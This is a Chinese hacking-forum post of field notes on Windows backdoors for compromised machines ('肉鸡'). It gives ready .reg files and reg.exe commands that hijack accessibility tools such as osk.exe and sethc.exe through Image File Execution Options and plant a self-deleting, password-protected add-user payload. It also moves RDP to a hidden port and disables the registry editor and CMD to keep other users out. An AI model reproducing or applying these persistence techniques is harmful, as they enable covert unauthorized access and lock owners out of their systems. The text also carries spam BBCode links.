注册表及组策略后门实测手札

lishiai

实测后记录下。有兴趣的结合一下，也许能从中得到后门的放置技巧
　　安静导入regedit /s *.reg
　　方法一、取消粘滞键 REG导入 sethc.reg
　　Windows Registry Editor Version 5.00
　　[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
　　"Flags"="506"
　　[HKEY_USERS\.DEFAULT\Control Panel\Accessibility\StickyKeys]
　　"Flags"="506"
　　注册表导入后，注销后生效。也就是将原值510改为506
　　方法二、开始→控制面板→[url=http://www.52wpe.net]外挂[/url]功能选项-键盘-粘滞键-设置-取消勾选“使用快捷键”复选框
　　高对比度：左侧 ALT + 左侧 SHIFT + PRINT SCREEN。
　　鼠标键：左侧 ALT + 左侧 SHIFT + NUM LOCK
　　这两个仍可调用sethc.exe作后门使用了。我们总不能与其它人用一样的shift 5次吧，其实调用的都是同一个东西
　　C:\WINDOWS\system32\utilman.exe ([url=http://www.52wpe.net]外挂[/url]工具管理器)WIN+U 调用
　　C:\WINDOWS\system32\osk.exe (屏幕键盘)
　　C:\WINDOWS\system32\magnify.exe (放大镜) 注：这几个都是可利用的
　　映像方法
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
　　"debugger"="c:\WINDOWS\\System32\\wbem\ysjy.exe"
　　sethc.exe配合映像方法的使用效果更好
　　综合以上我们可以作出如下后门
　　将 VBS加用户的脚本(http://bbs.77169.com/mainframe.php?tid=225157&fid=161)，制作成带密码的自解压ysjy.exe。
　　优点如下：
　　1、运行时VBS带参数后//B，防止重复加用户时，出现不必要的对话窗口。
　　2、注意使用后自动删除，自解压能实现。哈哈脚本加密必尽是可逆的
　　3、不管是他将sethc.exe替换成什么后门都不影响、自己的后门使用。哈哈我朋友就碰到过，怎么换都不行
　　4、可以在cmd禁用的条件下使用，防止他人使用cmd。
　　5、带个密码总是安全不少，且自己用rar工具破解自解压是不成功的。实测。
　　6、shift 5次不能调出，与众不同了。调用方法见上
　　下面的代码是，保护自己的成果。。其实自己很少保护自己的成果
　　3380远程端口修改 3380.reg
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]
　　"PortNumber"=dword:00000d34
　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
　　"PortNumber"=dword:00000d34
　　有必要改一下远程的端口，有很多人还是喜欢入侵前。先看一下3389有无shift后门。
　　注册表禁用与恢复
　　禁用
　　Windows Registry Editor Version 5.00
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
　　"DisableRegistryTools"=dword:00000001 //注册表恢复导入是行不通的。
　　恢复
　　gpedit.msc -用户配置-->管理模板-->系统 右面有个 -阻止访问注册表编辑工具-禁用
　　右键---新建--快捷方式----
　　在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能
　　%WinDir%\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t
　　REG_DWORD /d 0 /f (解注册表)
　　禁用注册表对肉鸡来说安全性提高不少，以上代码都是实测过的。网上的不见得行的通
　　禁用CMD
　　Windows Registry Editor Version 5.00
　　[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
　　"DisableCMD"=dword:00000001 //00000000恢复
　　右键---新建--快捷方式----
　　在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能 其实不用注册表在rar里的附加参数就能修改注册表
　　%WinDir%\System32\reg.exe add HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 0 /f
　　禁用CMD对其它入侵者来说提权难度高了不少。
　　大家可以综合一下，利用噢。顺便提一句，这里就不提供现成的工具了，懒得自己动手的人，我也帮不了。还是那句庆自己才是你最好的老师。